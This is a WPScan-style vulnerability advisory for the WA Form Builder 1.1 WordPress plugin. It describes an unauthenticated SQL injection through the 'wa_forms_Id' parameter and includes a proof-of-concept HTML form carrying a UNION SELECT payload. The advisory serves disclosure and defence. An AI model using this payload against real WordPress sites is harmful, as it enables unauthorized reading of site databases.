WA Form Builder 1.1 - Unauthenticated SQL Injection



Description
$_POST[ ‘wa_forms_Id’ ] is not escaped. WAFormBuilder_ui_output() is accessible to any user.
Proof of Concept
<form method="post" action="http://www.example.com/?p=1">
    <input type="text" name="wa_forms_Id" value="0 UNION SELECT 1,2,3.4,5,6,7,8,9,10,11,12,13,name,15,16,17,slug FROM wp_terms WHERE term_id=1"/>
    <input type="text" name="action" value="insert_data"/>
    <input type="submit">
</form>

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2016/11/29/wa-form-builder-1-1-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br
Submitter Twitter lenonleite
Views 4911
Verified No
WPVDB ID 8687

Timeline

Publicly Published 2016-12-05 (almost 3 years ago)
Added 2016-12-06 (almost 3 years ago)
Last Updated 2016-12-06 (almost 3 years ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin